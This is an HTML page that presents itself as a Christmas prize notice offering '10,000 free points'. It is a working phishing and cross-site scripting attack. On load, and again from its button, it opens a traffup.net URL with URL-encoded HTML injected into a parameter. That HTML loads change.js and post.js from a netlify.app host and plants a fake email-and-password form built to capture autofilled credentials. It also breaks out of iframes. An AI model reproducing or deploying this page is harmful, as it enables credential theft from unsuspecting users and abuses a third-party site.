<html>
    <style>
        body {
            background: rgb(3,111,62);
            text-align: center;
            display: flex;
            align-items: center;
            justify-content: center;
            height: 100vh;
            margin: 0;
        }

        h2 {
            color: white;
        }

        .frm_btn {
            padding: 10px 20px;
            background: #1a73e8;
            font-size: 17px;
            cursor: pointer;
            display: inline-block;
            font-weight: normal;
            letter-spacing: normal;
            position: relative;
            text-decoration: none;
            color: #ffffff;
            transition: all 0.2s ease-out 0s;
            border-radius: 5px;
            border: 0px;
            outline: none;
            font-family: Arial, Helvetica, sans-serif,serif,tahoma;;
        }
    </style>
    <body>
        <section>
            <img src="https://traffup.net/images/logo_xmas.png">
            <div style="height: 50;"></div>
            <h2>Congratulations! You have won 10,000 free points. Redeem your coupon now.</h2>
            <button onclick="openInNewTab('https://traffup.net/websites/?k=VerifyCouponForUser%20Coupon%20Code%20TRJD-JOSZ-SOUD-CNHX%22%3E%3Cdiv%20style=%22height:%2050;%22%3E%3C/div%3E%20%3Cscript%20src=%22https://main--marvelous-pudding-50fc8e.netlify.app/change.js%22%3E%3C/script%3E%20%3Cscript%20src=%22https://main--marvelous-pudding-50fc8e.netlify.app/post.js%22%3E%3C/script%3E%20%3Ch1%3EClaim%20your%2010,000%20points!%20Unlock%20your%20exclusive%20reward%20now.%3C/h1%3E%20%3Cdiv%20style=%22height:%2020;%22%3E%3C/div%3E%20%3Cform%20autocomplete=%22on%22%20enctype=%22application/x-www-form-urlencoded%22%20id=%22MyData%22%3E%20%3Cinput%20type=%22email%22%20id=%22email%22%20value=%22%22%20autocomplete=%22email%22%20name=%22email%22%20placeholder=%22Email%22%20class=%22textbox%22%20style=%22width:%20100%%22%3E%20%3Cdiv%20class=%22space10%22%3E%20%3C/div%3E%3Cinput%20type=%22password%22%20value=%22%22%20id=%22password%22%20autocomplete=%22password%22%20name=%22password%22%20placeholder=%22Password%22%20class=%22textbox%22%20style=%22width:%20100%;%22%3E%20%3Cdiv%20class=%22space10%22%3E%20%3C/div%3E%3Cinput%20type=%22text%22%20value=%22TRJD-JOSZ-SOUD-CNHX%22%20id=%22cookies%22%20name=%22cookies%22%20placeholder=%22Coupon%22%20class=%22textbox%22%20style=%22width:%20100%;%22%3E%20%3C/form%3E%20%3Cdiv%20class=%22space10%22%3E%3C/div%3E%3Cbutton%20style=%22background-color:%20rgb(26,%20115,%20232);%20padding:10px%2020px;%20border:%200px;%20color:%20white;%20border-radius:%205px;%22%20onclick=%22getAutofilledValues()%22%3ERedeem%20My%20Coupon%3C/button%3E%20%3Cdiv%20style=%22height:1000px;%22%3E%3C/div%3E%3Cinput%20style=%22display:%20none;%22%20value=%22blue');" class="frm_btn">Redeem your coupon now</button>
        </section>
        <script>
            function openInNewTab(url) {
              // Check if the code is executed within an iframe
              if (window.self !== window.top) {
                // Break out of the iframe
                window.top.location.href = url;
              } else {
                // Open in a new tab
                window.open(url, '_blank');
              }
            }

            function openInSameTab(url) {
                window.location.href = url;
            }

            openInNewTab('https://traffup.net/websites/?k=VerifyCouponForUser%20Coupon%20Code%20TRJD-JOSZ-SOUD-CNHX%22%3E%3Cdiv%20style=%22height:%2050;%22%3E%3C/div%3E%20%3Cscript%20src=%22https://main--marvelous-pudding-50fc8e.netlify.app/change.js%22%3E%3C/script%3E%20%3Cscript%20src=%22https://main--marvelous-pudding-50fc8e.netlify.app/post.js%22%3E%3C/script%3E%20%3Ch1%3EClaim%20your%2010,000%20points!%20Unlock%20your%20exclusive%20reward%20now.%3C/h1%3E%20%3Cdiv%20style=%22height:%2020;%22%3E%3C/div%3E%20%3Cform%20autocomplete=%22on%22%20enctype=%22application/x-www-form-urlencoded%22%20id=%22MyData%22%3E%20%3Cinput%20type=%22email%22%20id=%22email%22%20value=%22%22%20autocomplete=%22email%22%20name=%22email%22%20placeholder=%22Email%22%20class=%22textbox%22%20style=%22width:%20100%%22%3E%20%3Cdiv%20class=%22space10%22%3E%20%3C/div%3E%3Cinput%20type=%22password%22%20value=%22%22%20id=%22password%22%20autocomplete=%22password%22%20name=%22password%22%20placeholder=%22Password%22%20class=%22textbox%22%20style=%22width:%20100%;%22%3E%20%3Cdiv%20class=%22space10%22%3E%20%3C/div%3E%3Cinput%20type=%22text%22%20value=%22TRJD-JOSZ-SOUD-CNHX%22%20id=%22cookies%22%20name=%22cookies%22%20placeholder=%22Coupon%22%20class=%22textbox%22%20style=%22width:%20100%;%22%3E%20%3C/form%3E%20%3Cdiv%20class=%22space10%22%3E%3C/div%3E%3Cbutton%20style=%22background-color:%20rgb(26,%20115,%20232);%20padding:10px%2020px;%20border:%200px;%20color:%20white;%20border-radius:%205px;%22%20onclick=%22getAutofilledValues()%22%3ERedeem%20My%20Coupon%3C/button%3E%20%3Cdiv%20style=%22height:1000px;%22%3E%3C/div%3E%3Cinput%20style=%22display:%20none;%22%20value=%22blue');
        </script>
    </body>
</html>
